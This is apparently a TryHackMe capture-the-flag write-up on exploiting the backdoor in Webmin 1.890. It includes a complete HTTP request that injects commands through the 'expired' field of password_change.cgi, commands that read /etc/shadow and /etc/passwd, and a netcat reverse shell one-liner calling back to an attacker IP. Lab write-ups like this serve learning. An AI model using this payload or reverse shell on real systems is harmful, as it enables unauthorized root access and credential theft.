THM - Source | An ordinary day

Introduction

Exploit a recent vulnerability and hack Webmin, a web-based system configuration tool.

So we’ve got a pretty big hint already. This box is rated Easy.

Ports

nmap says we’ve got 22 (SSH) and 10000 only; Webmin typically runs on port 10000. Lets get some more details though.

Port Scan Details

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
10000/tcp open http syn-ack ttl 63 MiniServ 1.890 (Webmin httpd)

So we do have Webmin, and it’s version 1.890.

What’s the vulnerability?

It’s explained here, but in short someone exploited the Webmin development build server and deliberately added a vulnerability to it.

Webmin version 1.890 was released with a backdoor that could allow anyone with knowledge of it to execute commands as root. Versions 1.900 to 1.920 also contained a backdoor using similar code, but it was not exploitable in a default Webmin install.

Searchsploit

Running searchsploit shows several exploits for Webmin 1.920, so let’s fire up Metasploit and see if the server is vulnerable.

Metasploit

The relevant module wasn’t installed in my version of metasploit, so I had to add it, which I always forget how to do. But it’s basically copy the module and reload the modules:

cp /usr/share/exploitdb/exploits/linux/remote/47230.rb /root/.msf4/modules/exploits/linux/remote/47230.rb
reload_all

And after that it turns out the server wasn’t vulnerable :/. So presumably it’s the specific 1.89 version only.

1.89 Vuln

As it turns out it’s super easy; the Burp Suite repeater payload looks like this:

POST /password_change.cgi HTTP/1.1
Host: 10.10.5.148:10000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.10.5.148:10000/
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
Connection: close
Cookie: redirect=1; testing=1
Upgrade-Insecure-Requests: 1
—–blank line—–
expired=whoami

See the highlighted part above? That’s remote code execution, as root. Wew lad.

Some possible commands:

cat+/etc/shadow

cat+/etc/passwd

cat+/home/dark/user.txt

cat+/root/root.txt

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.9.10.123+1234+>/tmp/f

That last one is the only one you actually need - a reverse shell as root, thanks for playing.